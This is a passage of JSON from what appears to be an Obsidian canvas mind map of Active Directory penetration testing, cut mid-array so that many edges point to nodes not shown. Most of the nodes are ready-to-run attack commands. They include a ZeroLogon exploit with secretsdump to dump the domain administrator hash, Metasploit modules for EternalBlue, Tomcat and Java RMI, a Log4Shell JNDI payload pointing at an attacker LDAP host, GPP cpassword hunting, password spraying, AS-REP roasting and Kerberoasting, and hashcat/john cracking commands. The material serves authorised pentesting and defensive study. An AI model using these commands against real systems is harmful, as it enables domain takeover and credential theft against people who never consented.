{"type":"text","text":"DNS Zone transfer","id":"71c17a9669754889","x":-1713,"y":-303,"width":187,"height":60,"color":"5"},
{"type":"text","text":"Scan network","id":"3b3430ebb774c3bc","x":-1713,"y":-778,"width":187,"height":60,"color":"5"},
{"type":"text","text":"```bash\ncrackmapexec smb $ip -u 'a' -p ''\n```","id":"8af125cfcc7ef6d1","x":-1419,"y":124,"width":409,"height":60},
{"type":"text","text":"AD pentesting","id":"d49852cf325e5f86","x":-2382,"y":170,"width":250,"height":60},
{"type":"text","text":"Enumerate LDAP","id":"75b8a1968a27ce2f","x":-1713,"y":263,"width":187,"height":60,"color":"5"},
{"type":"text","text":"```bash\ncrackmapexec smb <IP-range>\n```","id":"e1444e1f11d2ee45","x":-1419,"y":-987,"width":499,"height":50},
{"type":"text","text":"```bash\nnmap -sP -p- $ip\n```","id":"79bd3d2569ff33ff","x":-1419,"y":-919,"width":499,"height":60},
{"type":"text","text":"Admin","id":"7dc30c3b01bcd4aa","x":2783,"y":-1905,"width":162,"height":60,"color":"#ff00ff"},
{"type":"text","text":"Result / Go to","id":"7036cff06a67b690","x":2488,"y":-1833,"width":168,"height":57},
{"type":"text","text":"Domain Admin","id":"ef085fbeb08c5843","x":2783,"y":-1801,"width":162,"height":60,"color":"1"},
{"type":"text","text":"Find DC IP","id":"9f3bade1a260738f","x":-1713,"y":-426,"width":187,"height":60,"color":"5"},
{"type":"text","text":"Coerce SMB ->","id":"0c0ab88c019d8df8","x":-517,"y":1258,"width":164,"height":60,"color":"3"},
{"type":"text","text":"```bash\n${jndi:ldap://<ip>:<port> /o=reference}\n```","id":"de30de850c7520d0","x":676,"y":-759,"width":413,"height":75},
{"type":"text","text":"Log4shell","id":"1c6039eb70b8e8b4","x":387,"y":-752,"width":250,"height":60,"color":"#7c0404"},
{"type":"text","text":"Database credentials","id":"a971808f69b49a66","x":387,"y":-672,"width":250,"height":60},
{"type":"text","text":"rogue Jndi-1.0.jar","id":"1c53e813cb3bcadb","x":1139,"y":-752,"width":167,"height":60},
{"type":"text","text":"```bash\npython3 restorepassword.py -target-ip $ip <DOMAIN>/<MACHINE_BIOS_NAME>@<MACHINE_BIOS_NAME> -hexpass <HEXPASS>\n```","id":"ee728fb87728b669","x":1569,"y":-1778,"width":634,"height":73},
{"type":"text","text":"```metasploit\nexploit/multi/http/tomcat_mgr_deploy\n```","id":"29aa61b7fdc3f8c1","x":714,"y":-1221,"width":381,"height":50},
{"type":"text","text":"Result / Go to","id":"2623972afe90af48","x":1401,"y":-853,"width":168,"height":57},
{"type":"text","text":"Domain Admin","id":"ddd412c0be7f838f","x":1651,"y":-856,"width":250,"height":60},
{"type":"text","text":"MSSQL connection","id":"e9892a03e61b81ca","x":1114,"y":-672,"width":250,"height":60,"color":"#0f0c17"},
{"type":"text","text":"java serialized port","id":"887aa0fd1d482358","x":387,"y":-1072,"width":250,"height":60},
{"type":"text","text":"java rmi","id":"c4991b5a4f896f90","x":387,"y":-1152,"width":250,"height":60},
{"type":"text","text":"``` bash\nsearchsploit\n```","id":"74ea42d4f1c3e968","x":683,"y":-992,"width":183,"height":60},
{"type":"text","text":"ysoserial","id":"58df5711b400e917","x":683,"y":-1072,"width":183,"height":60},
{"type":"text","text":"```metasploit\nuse admin/mssql/mssql_enum_sql_logins\n```","id":"b8b25ac74a8ebf26","x":681,"y":-667,"width":381,"height":50},
{"type":"text","text":"Admin","id":"cdfdab792a946d43","x":1651,"y":-927,"width":250,"height":60,"color":"#ff00ff"},
{"type":"text","text":"Proxyshell","id":"da3003709756312e","x":387,"y":-832,"width":250,"height":60,"color":"#7c0404"},
{"type":"text","text":"tomcat/jboss manager","id":"4fb20b49e923c7d0","x":387,"y":-1263,"width":250,"height":60},
{"type":"text","text":"```cmd\nfindstr /S /I cpassword \\\\<FQDN>\\sysvol\\<FQDN>\\policies\\*.xml*\n```","id":"babc665b2228f19f","x":714,"y":-1402,"width":1172,"height":50},
{"type":"text","text":"```metasploit\nauxiliary/scanner/http/tomcat\n```","id":"3c4aade584dca09e","x":714,"y":-1296,"width":381,"height":50},
{"type":"text","text":"Vulnerable product with CVE","id":"3d1eaa1120a48ec0","x":387,"y":-992,"width":250,"height":60},
{"type":"text","text":"Low Access","id":"6ae2f33ef66afb2c","x":1651,"y":-785,"width":250,"height":60,"color":"#969292"},
{"type":"text","text":"Low hanging fruit","id":"7c7d2ce9046d09ae","x":24,"y":-1090,"width":250,"height":60,"color":"4"},
{"type":"text","text":"SYSVOL & GPP\nMS14-025","id":"3caa527de4a49425","x":387,"y":-1449,"width":250,"height":60,"color":"#7c0404"},
{"type":"text","text":"Proxylogon","id":"44ad3d1ccfdcec6b","x":387,"y":-912,"width":250,"height":60,"color":"#7c0404"},
{"type":"text","text":"```metasploit\nexploit/multi/misc/java_rmi_server\n```","id":"0c64d7ae6aacf7b9","x":676,"y":-1147,"width":381,"height":50},
{"type":"text","text":"```metasploit\nuse scanner/smb/smb_enum_gpp\n```","id":"9698369517d0d209","x":714,"y":-1474,"width":1172,"height":50},
{"type":"text","text":"```metasploit\nexploit/windows/smb/ms17_010_eternalblue\n```","id":"e954899ef3d352d9","x":714,"y":-1557,"width":1172,"height":50},
{"type":"text","text":"etc....","id":"1aee0c2bf40730f3","x":387,"y":-592,"width":250,"height":60},
{"type":"text","text":"```bash\nzerologon-scan '<dc_netbios_name>' $ip\n```","id":"0d4ed1ab9c56f993","x":714,"y":-1905,"width":586,"height":50},
{"type":"text","text":"```bash\npython3 cve-2020-1472-exploit.py <MACHINE_BIOS_NAME> $ip\n```\n\n```bash \nsecretsdump.py <DOMAIN>/<MACHINE_BIOS_NAME>\\$@<IP> -no-pass -just-dc-user \"administrator\"\n```\n\n```bash\nsecretsdump.py -hashes:<HASH_admin> <DOMAIN>/administrator@$ip\n```\n","id":"08a793f6de33ca4c","x":714,"y":-1833,"width":771,"height":233},
{"type":"text","text":"Eternal Blue\nMS17-010","id":"312360df0fd70d52","x":387,"y":-1562,"width":250,"height":60,"color":"#7c0404"},
{"type":"text","text":"zerologon (unsafe)\n(CVE-2020-1472)","id":"c302052b9b4b0337","x":387,"y":-1855,"width":250,"height":75,"color":"#7c0404"},
{"type":"text","text":"Get hash","id":"d92c09bbf9f06ed9","x":664,"y":1194,"width":250,"height":50},
{"type":"text","text":"Blind Kerberoasting","id":"82c4151634122acd","x":664,"y":1395,"width":250,"height":60,"color":"5"},
{"type":"text","text":"```bash\ncrackmapexec smb <dc-ip> -u user.txt -p password.txt --no-bruteforce\n```","id":"8d25cd7559182320","x":691,"y":582,"width":620,"height":50},
{"type":"text","text":"```powershell\nGet-ADFineGrainedPasswordPolicy -filter *\n```","id":"b988ce3d097af85e","x":1325,"y":342,"width":468,"height":50},
{"type":"text","text":"```powershell\nGet-ADUserResultantPasswordPolicy -Identify <user>\n```","id":"87d700b115294633","x":1325,"y":422,"width":468,"height":50},
{"type":"text","text":"```bash\nldapsearch-ad.py --server '<dc>' -d <domain> -u <user> -p <pass> --type pass-pols\n```","id":"5473d0f9049f89a3","x":1325,"y":497,"width":468,"height":64},
{"type":"text","text":"Hash found (TGS)","id":"4739cb7c3c19787c","x":1587,"y":1364,"width":174,"height":87,"color":"2"},
{"type":"text","text":"Clear text credentials found","id":"afb4a85b3dfc3809","x":1439,"y":670,"width":296,"height":60,"color":"#37ff00"},
{"type":"text","text":"```bash\nGet-DomainUser -PreauthNotRequired -Properties SamAccountName\n```","id":"c11262a9f09b1fae","x":1049,"y":885,"width":523,"height":82},
{"type":"text","text":"```bloodhound\nMATCH (u:User{dontreqpreauth:true}), (c:Computer), p=shortestPath((u)-[*1..]->(c)) RETURN p\n```","id":"142fd2c7b0128f90","x":1049,"y":1003,"width":523,"height":82},
{"type":"text","text":"Hash found (ASREP)","id":"74c64308221cb1a0","x":1587,"y":1158,"width":204,"height":86,"color":"2"},
{"type":"text","text":"```bash\nGetUserSPNs.py -no-preauth \"<asrep_user>\"-userfile \"<user_list.txt>\"-dc-host \"<dc-ip>\" \"<domain>\"\n```","id":"e979e1c36be17d6b","x":988,"y":1425,"width":523,"height":82},
{"type":"text","text":"```bash\ncrackmapexec $ip -u 'user'-p 'password' --pass-pol\n```","id":"810c93f7e485fb07","x":1169,"y":132,"width":479,"height":50},
{"type":"text","text":"```bash\nenum4linux -u 'username' -p 'password' -P $ip\n```","id":"3b824c95aeceb06f","x":1169,"y":208,"width":479,"height":50},
{"type":"text","text":"```powershell\nGet-ADDefaultDomainPasswordPolicy\n```","id":"1d61026376460ddc","x":1169,"y":277,"width":479,"height":50},
{"type":"text","text":"FGGP","id":"fcbe5c360e799d0c","x":1169,"y":417,"width":87,"height":60,"color":"5"},
{"type":"text","text":"Get password policy (need creds, but you should get the policy before starting a spray)","id":"435409a34a85bee5","x":700,"y":258,"width":390,"height":69,"color":"5"},
{"type":"text","text":"```bash\nRubeus.exe keberoast /domain:<domain> /dc:<dcip> /nopreauth:<asrep_user> /spns:<users.txt>\n```","id":"2f85a7beecb47420","x":988,"y":1323,"width":523,"height":82},
{"type":"text","text":"```bash\nsprayhound -U <users.txt> -d <domain> -dc <dc-ip>\n```","id":"03094d327110f677","x":691,"y":784,"width":523,"height":76},
{"type":"text","text":"```bash\ncrackmapexec smb <dc-ip> -u user.txt -p password.txt\n```","id":"170bdb7e4ccb0c18","x":691,"y":679,"width":523,"height":51},
{"type":"text","text":"```bash\nGetUserSPNs.py <domain>/ -usersfile <usernames.txt> -format hashcat -outputfile <hashes.domain.txt>\n```","id":"de738177fe56c369","x":988,"y":1112,"width":523,"height":82},
{"type":"text","text":"```bash\nRubeus.exe asreproast /format:hashcat\n```","id":"ef4cea23eb6a6378","x":988,"y":1244,"width":523,"height":57},
{"type":"text","text":"```bash\nhashcat -m 3000 -a 3 hash.txt rockyou.txt\n```","id":"909e585839408cc8","x":2915,"y":1363,"width":552,"height":50},
{"type":"text","text":"ASREPRoast","id":"74ea24bfce8e6162","x":361,"y":1283,"width":171,"height":60,"color":"5"},
{"type":"text","text":"Password spray","id":"c433af615eb2ef45","x":361,"y":388,"width":184,"height":60,"color":"5"},
{"type":"text","text":"Got valid username","id":"88f13b27794d5766","x":98,"y":964,"width":164,"height":60,"color":"#31dbdd"},
{"type":"text","text":"```bash\njohn --format=lm hash.txt\n```","id":"a4f015a2da4a7352","x":2915,"y":1283,"width":552,"height":50},
{"type":"text","text":"Get ASREPRoastable users (need creds)","id":"0e8b87ca20123bc2","x":653,"y":962,"width":335,"height":62},
{"type":"text","text":"```bash\npython3 CVE-2022-33679.py <domain>/<user> <target>\n```","id":"1f322488c9295b4a","x":952,"y":1536,"width":491,"height":90},
{"type":"text","text":"CVE-2022-33679","id":"6d71e75660388b2e","x":664,"y":1551,"width":250,"height":60,"color":"#7c0404"},
{"type":"text","text":"Lateral move (PTT)","id":"11326779f0bcb47a","x":1511,"y":1551,"width":250,"height":60,"color":"#484e7f"},
{"type":"text","text":"```bash\njohn --format=nt hash.txt\n```","id":"9077485b47bbd068","x":2915,"y":1444,"width":552,"height":50},
{"type":"text","text":"```bash\nhashcat -m 1000 -a 3 hash.txt rockyou.txt\n```","id":"8aef7b94299bb1b3","x":2915,"y":1524,"width":552,"height":50},
{"type":"text","text":"```bash\njohn --format=netntlm hash.txt\n```","id":"62f5191c11944cfd","x":2915,"y":1635,"width":552,"height":50},
{"type":"text","text":"```bash\nhashcat -m 5500 -a 3 hash.txt rockyou.txt\n```","id":"209d7bca7fb52ac5","x":2915,"y":1715,"width":552,"height":50},
{"type":"text","text":"Kerberos 5 TGS","id":"82c0786a65635033","x":2559,"y":2000,"width":250,"height":60,"color":"2"},
{"type":"text","text":"```bash\nhashcat -m 13100 -a 0 spn.txt rockyou.txt\n```","id":"b6cde9eadb3abe3c","x":2915,"y":2045,"width":552,"height":50},
{"type":"text","text":"Kerberos 5 TGS AES128","id":"4c001130035fcf35","x":2559,"y":2128,"width":250,"height":60,"color":"2"},
{"type":"text","text":"```bash\njohn --format=krb5tgs spn.txt --wordlist=rockyou.txt\n```","id":"5adb8632cd597518","x":2915,"y":1965,"width":552,"height":50},
{"type":"text","text":"```bash\nhashcat -m 5600 -a 0 hash.txt rockyou.txt\n```","id":"6b95c62f0322463b","x":2915,"y":1884,"width":552,"height":50},
{"type":"text","text":"```bash\njohn --format=netntlmv2 hash.txt\n```","id":"04d82baa209275fc","x":2915,"y":1804,"width":552,"height":50},
{"type":"text","text":"LM","id":"1446fea94896a358","x":2559,"y":1318,"width":250,"height":60,"color":"2"},
{"type":"text","text":"NTLM","id":"06346ae3417f3a6f","x":2559,"y":1479,"width":250,"height":60,"color":"2"},
{"type":"text","text":"NetNTLMv1","id":"ad0336fabea1533c","x":2559,"y":1670,"width":250,"height":60,"color":"2"},
{"type":"text","text":"```bash\nhashcat -m 19600 -a 0 spn.txt rockyou.txt\n```","id":"bb5cb33074002f42","x":2915,"y":2133,"width":552,"height":50},
{"type":"text","text":"Crack hash","id":"1394a4460b5c048b","x":2265,"y":1839,"width":164,"height":60,"color":"2"},
{"type":"text","text":"NetNTLMv2","id":"569259c7e1c77756","x":2559,"y":1839,"width":250,"height":60,"color":"2"},
{"type":"text","text":"User account clear text password","id":"75ba5121af55828d","x":3680,"y":1829,"width":232,"height":70,"color":"4"},
{"type":"text","text":"User account clear text password","id":"e4796d34e2b5a881","x":3442,"y":-5916,"width":232,"height":70,"color":"4"},
{"type":"text","text":"Search password files","id":"2551912deeeec43a","x":2474,"y":-5911,"width":250,"height":60}
],
"edges":[
{"id":"e6bd9159a1e75674","fromNode":"3b3430ebb774c3bc","fromSide":"right","toNode":"e1444e1f11d2ee45","toSide":"left"},
{"id":"db32078e0f8f2632","fromNode":"3b3430ebb774c3bc","fromSide":"right","toNode":"79bd3d2569ff33ff","toSide":"left"},
{"id":"eed17e16eec7d6f1","fromNode":"3b3430ebb774c3bc","fromSide":"right","toNode":"e34cd4be899de1b1","toSide":"left"},
{"id":"5059318dc41c64e1","fromNode":"3b3430ebb774c3bc","fromSide":"right","toNode":"970caa7ff00527ff","toSide":"left"},
{"id":"c03a0c3cc69b090f","fromNode":"3b3430ebb774c3bc","fromSide":"right","toNode":"5aea1cf60aabd994","toSide":"left"},
{"id":"861ac2d2c05f127b","fromNode":"3b3430ebb774c3bc","fromSide":"right","toNode":"2cadfd052197f008","toSide":"left"},
{"id":"e45ffe0d476aa6e6","fromNode":"3b3430ebb774c3bc","fromSide":"right","toNode":"09bbbed589f90ee7","toSide":"left"},
{"id":"acbb43d3340e7b97","fromNode":"09bbbed589f90ee7","fromSide":"right","toNode":"e28615a1a57b8503","toSide":"left"},
{"id":"e6bc0df534e53515","fromNode":"2cadfd052197f008","fromSide":"right","toNode":"e28615a1a57b8503","toSide":"left"},
{"id":"37cd9a24fb6b1751","fromNode":"5aea1cf60aabd994","fromSide":"right","toNode":"e28615a1a57b8503","toSide":"left"},
{"id":"193ea202313ab402","fromNode":"970caa7ff00527ff","fromSide":"right","toNode":"e28615a1a57b8503","toSide":"left"},
{"id":"7602ad83f204cbcb","fromNode":"e34cd4be899de1b1","fromSide":"right","toNode":"e28615a1a57b8503","toSide":"left"},
{"id":"e7f25e935b745c5c","fromNode":"79bd3d2569ff33ff","fromSide":"right","toNode":"e28615a1a57b8503","toSide":"left"},
{"id":"878fe7e7b0d169cf","fromNode":"d49852cf325e5f86","fromSide":"right","toNode":"ac88013e301f4359","toSide":"left"},
{"id":"f4fec756dd6c87d9","fromNode":"9f3bade1a260738f","fromSide":"right","toNode":"3a42b30472341f68","toSide":"left"},
{"id":"16fac5af8f699d62","fromNode":"9f3bade1a260738f","fromSide":"right","toNode":"552dbd3bdd5243b3","toSide":"left"},
{"id":"417f7adcd6064e60","fromNode":"71c17a9669754889","fromSide":"right","toNode":"7ea9e3211107b13f","toSide":"left"},
{"id":"07041801abbc0fa2","fromNode":"8e9ea2e9822ae2b1","fromSide":"right","toNode":"de65e76747b04d9e","toSide":"left"},
{"id":"7d724c2f30fa053b","fromNode":"8e9ea2e9822ae2b1","fromSide":"right","toNode":"d70f0e48b88f0c2b","toSide":"left"},
{"id":"059e69aaf69da17f","fromNode":"8e9ea2e9822ae2b1","fromSide":"right","toNode":"303ddccb2f582faa","toSide":"left"},
{"id":"6762e654136cecb8","fromNode":"8e9ea2e9822ae2b1","fromSide":"right","toNode":"19c2801d90c6dac8","toSide":"left"},
{"id":"accf5fe967afbff4","fromNode":"8e9ea2e9822ae2b1","fromSide":"right","toNode":"8af125cfcc7ef6d1","toSide":"left"},
{"id":"74e3f8e346fa6ebd","fromNode":"75b8a1968a27ce2f","fromSide":"right","toNode":"afad5fb61a5b41c8","toSide":"left"},
{"id":"a5a7206a457c6280","fromNode":"75b8a1968a27ce2f","fromSide":"right","toNode":"0ea07e6ccb96eb5e","toSide":"left"},
{"id":"23b4dce3d3aad44c","fromNode":"afad5fb61a5b41c8","fromSide":"right","toNode":"e33d5d29466126f4","toSide":"left"},
{"id":"e1fb270600b8a6b3","fromNode":"0ea07e6ccb96eb5e","fromSide":"right","toNode":"e33d5d29466126f4","toSide":"left"},
{"id":"65df31c7ebdb35eb","fromNode":"e33d5d29466126f4","fromSide":"right","toNode":"a648cb90f6797cf5","toSide":"left","color":"#31dbdd"},
{"id":"7bf71f9aa60b1b92","fromNode":"e28615a1a57b8503","fromSide":"right","toNode":"2eeaf30e7d43aa1e","toSide":"left","color":"4"},
{"id":"1168c3bd3fd30850","fromNode":"bc52dd330dabaa5e","fromSide":"right","toNode":"d3eda11a689e3213","toSide":"left"},
{"id":"e204ccefc85e2e91","fromNode":"bc52dd330dabaa5e","fromSide":"right","toNode":"640fde233349daf8","toSide":"left"},
{"id":"f52fa90fdad7b53c","fromNode":"bc52dd330dabaa5e","fromSide":"right","toNode":"9c0090a0701fc05a","toSide":"left"},
{"id":"cfcbaefd90d53a53","fromNode":"bc52dd330dabaa5e","fromSide":"right","toNode":"ef4d1435f4127e9c","toSide":"left"},
{"id":"a192d8bc2212391c","fromNode":"ef4d1435f4127e9c","fromSide":"right","toNode":"7663efa4fca553c8","toSide":"left"},
{"id":"51fb644e8f067ac7","fromNode":"7663efa4fca553c8","fromSide":"right","toNode":"475c8040ecef93ce","toSide":"left"},
{"id":"2486029c0770ebd9","fromNode":"9c0090a0701fc05a","fromSide":"right","toNode":"475c8040ecef93ce","toSide":"left"},
{"id":"42b5c39f5eb54cd9","fromNode":"640fde233349daf8","fromSide":"right","toNode":"475c8040ecef93ce","toSide":"left"},
{"id":"ef926f8dc55afb2f","fromNode":"d3eda11a689e3213","fromSide":"right","toNode":"475c8040ecef93ce","toSide":"left"},
{"id":"ae12c71fb6e8105d","fromNode":"475c8040ecef93ce","fromSide":"right","toNode":"a648cb90f6797cf5","toSide":"left","color":"5"},
{"id":"108d7d4ad6c26861","fromNode":"12acd8fe356c1bfc","fromSide":"right","toNode":"44d7daa03cbf639b","toSide":"left"},
{"id":"4314b643a235fcc6","fromNode":"12acd8fe356c1bfc","fromSide":"right","toNode":"c4b69d972e7ee1e9","toSide":"left"},
{"id":"bd2a8770492171fb","fromNode":"12acd8fe356c1bfc","fromSide":"right","toNode":"5ffdaedfa603d595","toSide":"left"},
{"id":"b2403b58141ecaee","fromNode":"44d7daa03cbf639b","fromSide":"right","toNode":"f95aa1b75c2a67b8","toSide":"left"},
{"id":"30e1a1971e311ea4","fromNode":"44d7daa03cbf639b","fromSide":"right","toNode":"545e543172dc6d51","toSide":"left"},
{"id":"59b4872c6d8099cd","fromNode":"f95aa1b75c2a67b8","fromSide":"right","toNode":"ff4e51f72dab03cf","toSide":"left"},
{"id":"081664a22368edbb","fromNode":"545e543172dc6d51","fromSide":"right","toNode":"ff4e51f72dab03cf","toSide":"left"},
{"id":"eddf8e62869b8e02","fromNode":"c4b69d972e7ee1e9","fromSide":"right","toNode":"9b97556bfac9f9d8","toSide":"left"},
{"id":"61cec79c1ec86fd0","fromNode":"9b97556bfac9f9d8","fromSide":"right","toNode":"ff4e51f72dab03cf","toSide":"left"},
{"id":"5aa65f7592401398","fromNode":"5ffdaedfa603d595","fromSide":"right","toNode":"5f17da44a3fac888","toSide":"left"},
{"id":"c264bb230f689084","fromNode":"5f17da44a3fac888","fromSide":"right","toNode":"ff4e51f72dab03cf","toSide":"left"},
{"id":"58b820408ce52cb2","fromNode":"6a7277f50eb06e79","fromSide":"right","toNode":"b5259f511998e728","toSide":"left"},
{"id":"5a24f402567c20b4","fromNode":"b5259f511998e728","fromSide":"right","toNode":"18213f5195f600ba","toSide":"left"},
{"id":"1d5fe7d940ecd6bf","fromNode":"18213f5195f600ba","fromSide":"right","toNode":"0c0ab88c019d8df8","toSide":"left"},
{"id":"162b399aa19c2400","fromNode":"0c0ab88c019d8df8","fromSide":"right","toNode":"3de84bfe460894aa","toSide":"left","color":"3"},
{"id":"b9fd81ee8b9830fe","fromNode":"ff4e51f72dab03cf","fromSide":"right","toNode":"3de84bfe460894aa","toSide":"left","color":"3"},
{"id":"6f129f781e28637a","fromNode":"4a5c61595a84f24b","fromSide":"right","toNode":"d00cf0b295950050","toSide":"left"},
{"id":"6acbba6a8ca5353d","fromNode":"243546a3742534e4","fromSide":"right","toNode":"4206fa0a2cbba7e0","toSide":"left"},
{"id":"87433467a6553801","fromNode":"243546a3742534e4","fromSide":"right","toNode":"581059a1f1f61cd8","toSide":"left"},
{"id":"8f8e83fa1c07e65a","fromNode":"243546a3742534e4","fromSide":"right","toNode":"42b163c28a6085d0","toSide":"left"},
{"id":"b6f2f39a5d6e1fef","fromNode":"4a5c61595a84f24b","fromSide":"right","toNode":"394eb6dedb87ac1e","toSide":"left"},
{"id":"a34e53a6627b77e2","fromNode":"4a5c61595a84f24b","fromSide":"right","toNode":"1c4d6f661b1e09b8","toSide":"left"},
{"id":"cc7c26545549eb12","fromNode":"8d43cc23f6800e6a","fromSide":"right","toNode":"6208b8ec8cb8bd51","toSide":"left"},
{"id":"2f3356408ac7d229","fromNode":"581059a1f1f61cd8","fromSide":"right","toNode":"fc566e1c8a5a13c8","toSide":"left"},
{"id":"6f2d036fc99262d4","fromNode":"4206fa0a2cbba7e0","fromSide":"right","toNode":"fc566e1c8a5a13c8","toSide":"left"},
{"id":"d744be4d93b2ce2d","fromNode":"42b163c28a6085d0","fromSide":"right","toNode":"fc566e1c8a5a13c8","toSide":"left"},
{"id":"5efc093bec43f345","fromNode":"fc566e1c8a5a13c8","fromSide":"right","toNode":"6cd7aae84eb27967","toSide":"left"},
{"id":"1af2111ea5d99054","fromNode":"fc566e1c8a5a13c8","fromSide":"right","toNode":"406a3ccd2d14dac8","toSide":"left"},
{"id":"bb8f4c44167dedbc","fromNode":"fc566e1c8a5a13c8","fromSide":"right","toNode":"3d7d2fc5a1b39405","toSide":"left"},
{"id":"96969dadaf8aa861","fromNode":"7c7d2ce9046d09ae","fromSide":"right","toNode":"c302052b9b4b0337","toSide":"left"},
{"id":"a08adbcc7a49fa89","fromNode":"7c7d2ce9046d09ae","fromSide":"right","toNode":"312360df0fd70d52","toSide":"left"},
{"id":"f67b3eb976d3de2a","fromNode":"7c7d2ce9046d09ae","fromSide":"right","toNode":"3caa527de4a49425","toSide":"left"},
{"id":"6473538d81711186","fromNode":"7c7d2ce9046d09ae","fromSide":"right","toNode":"4fb20b49e923c7d0","toSide":"left"},
{"id":"ad534e614a97ef92","fromNode":"7c7d2ce9046d09ae","fromSide":"right","toNode":"c4991b5a4f896f90","toSide":"left"},
{"id":"de37cb3f1f124688","fromNode":"7c7d2ce9046d09ae","fromSide":"right","toNode":"887aa0fd1d482358","toSide":"left"},
{"id":"9fae76e866bd256e","fromNode":"7c7d2ce9046d09ae","fromSide":"right","toNode":"3d1eaa1120a48ec0","toSide":"left"},
{"id":"d66cc6336be16038","fromNode":"7c7d2ce9046d09ae","fromSide":"right","toNode":"44ad3d1ccfdcec6b","toSide":"left"},
{"id":"b9c86429fe0debcc","fromNode":"7c7d2ce9046d09ae","fromSide":"right","toNode":"da3003709756312e","toSide":"left"},
{"id":"9997cd33a4e59b6c","fromNode":"7c7d2ce9046d09ae","fromSide":"right","toNode":"1c6039eb70b8e8b4","toSide":"left"},
{"id":"4d908193d2a85d31","fromNode":"7c7d2ce9046d09ae","fromSide":"right","toNode":"a971808f69b49a66","toSide":"left"},
{"id":"49d47cbc9ef978ef","fromNode":"7c7d2ce9046d09ae","fromSide":"right","toNode":"1aee0c2bf40730f3","toSide":"left"},
{"id":"138fbbdfc5995e45","fromNode":"88f13b27794d5766","fromSide":"right","toNode":"c433af615eb2ef45","toSide":"left"},
{"id":"0b47dddd3fb6b9f8","fromNode":"88f13b27794d5766","fromSide":"right","toNode":"74ea24bfce8e6162","toSide":"left"},
{"id":"6cabd56699212e65","fromNode":"74ea24bfce8e6162","fromSide":"right","toNode":"6d71e75660388b2e","toSide":"left"},
{"id":"3e52b9f3b175f3b3","fromNode":"74ea24bfce8e6162","fromSide":"right","toNode":"82c4151634122acd","toSide":"left"},
{"id":"e72c58b5e17d1663","fromNode":"74ea24bfce8e6162","fromSide":"right","toNode":"d92c09bbf9f06ed9","toSide":"left"},
{"id":"744c37e76481026f","fromNode":"74ea24bfce8e6162","fromSide":"right","toNode":"0e8b87ca20123bc2","toSide":"left"},
{"id":"9229a83414f10c4b","fromNode":"6d71e75660388b2e","fromSide":"right","toNode":"1f322488c9295b4a","toSide":"left"},
{"id":"9f7653aa18be8853","fromNode":"1f322488c9295b4a","fromSide":"right","toNode":"11326779f0bcb47a","toSide":"left"},
{"id":"6dc8c43f17746e23","fromNode":"82c4151634122acd","fromSide":"right","toNode":"e979e1c36be17d6b","toSide":"left"},
{"id":"95220f4c412ddb84","fromNode":"82c4151634122acd","fromSide":"right","toNode":"2f85a7beecb47420","toSide":"left"},
{"id":"adf831bb85796140","fromNode":"e979e1c36be17d6b","fromSide":"right","toNode":"4739cb7c3c19787c","toSide":"left"},
{"id":"61bd1b90a010956e","fromNode":"2f85a7beecb47420","fromSide":"right","toNode":"4739cb7c3c19787c","toSide":"left"},
{"id":"0357181d11d4b0b0","fromNode":"d92c09bbf9f06ed9","fromSide":"right","toNode":"ef4cea23eb6a6378","toSide":"left"},
{"id":"78bd7d47c195e9c1","fromNode":"d92c09bbf9f06ed9","fromSide":"right","toNode":"de738177fe56c369","toSide":"left"},
{"id":"f94f0d2ff53af4d5","fromNode":"ef4cea23eb6a6378","fromSide":"right","toNode":"74c64308221cb1a0","toSide":"left"},
{"id":"0ee1e23b8db3fd73","fromNode":"de738177fe56c369","fromSide":"right","toNode":"74c64308221cb1a0","toSide":"left"},
{"id":"fa2fc8215278e3b3","fromNode":"0e8b87ca20123bc2","fromSide":"right","toNode":"142fd2c7b0128f90","toSide":"left"},
{"id":"d37ad65a15fda438","fromNode":"0e8b87ca20123bc2","fromSide":"right","toNode":"c11262a9f09b1fae","toSide":"left"},
{"id":"7f85ceabeed8405f","fromNode":"c433af615eb2ef45","fromSide":"right","toNode":"03094d327110f677","toSide":"left"},
{"id":"0910128a198678e0","fromNode":"c433af615eb2ef45","fromSide":"right","toNode":"170bdb7e4ccb0c18","toSide":"left"},
{"id":"5e385efb94a02a3b","fromNode":"c433af615eb2ef45","fromSide":"right","toNode":"8d25cd7559182320","toSide":"left"},
{"id":"3ef9988060730735","fromNode":"c433af615eb2ef45","fromSide":"right","toNode":"435409a34a85bee5","toSide":"left"},
{"id":"f8fc99a3549495b5","fromNode":"8d25cd7559182320","fromSide":"right","toNode":"afb4a85b3dfc3809","toSide":"left"},
{"id":"5a2a35a8c132ac14","fromNode":"170bdb7e4ccb0c18","fromSide":"right","toNode":"afb4a85b3dfc3809","toSide":"left"},
{"id":"cfac2afa55c882c3","fromNode":"03094d327110f677","fromSide":"right","toNode":"afb4a85b3dfc3809","toSide":"left"},
{"id":"75854f5dcc7cd474","fromNode":"435409a34a85bee5","fromSide":"right","toNode":"810c93f7e485fb07","toSide":"left"},
{"id":"73a677f7745f1dd5","fromNode":"435409a34a85bee5","fromSide":"right","toNode":"3b824c95aeceb06f","toSide":"left"},
{"id":"a19f4b4fea44a034","fromNode":"435409a34a85bee5","fromSide":"right","toNode":"1d61026376460ddc","toSide":"left"},
{"id":"cf50b11c46f0389e","fromNode":"435409a34a85bee5","fromSide":"right","toNode":"fcbe5c360e799d0c","toSide":"left"},
{"id":"858441e3a925bc30","fromNode":"fcbe5c360e799d0c","fromSide":"right","toNode":"87d700b115294633","toSide":"left"},
{"id":"73cd733e86843d96","fromNode":"fcbe5c360e799d0c","fromSide":"right","toNode":"b988ce3d097af85e","toSide":"left"},
{"id":"a7bfc1eb80db1b49","fromNode":"fcbe5c360e799d0c","fromSide":"right","toNode":"5473d0f9049f89a3","toSide":"left"},
{"id":"bf8741ee99d3ab69","fromNode":"a648cb90f6797cf5","fromSide":"right","toNode":"dbaced8dfb7fd663","toSide":"left","color":"2"},
{"id":"81634bd45c3de4a3","fromNode":"1394a4460b5c048b","fromSide":"right","toNode":"1446fea94896a358","toSide":"left"},
{"id":"abdfcab66e4c5222","fromNode":"1394a4460b5c048b","fromSide":"right","toNode":"06346ae3417f3a6f","toSide":"left"},
{"id":"eeb4a914224bb1cb","fromNode":"1394a4460b5c048b","fromSide":"right","toNode":"ad0336fabea1533c","toSide":"left"},
{"id":"a507ca846509ca95","fromNode":"1394a4460b5c048b","fromSide":"right","toNode":"569259c7e1c77756","toSide":"left"},
{"id":"854001899ede95a6","fromNode":"1394a4460b5c048b","fromSide":"right","toNode":"82c0786a65635033","toSide":"left"},
{"id":"c1b4cab9c2b475f1","fromNode":"1394a4460b5c048b","fromSide":"right","toNode":"4c001130035fcf35","toSide":"left"},
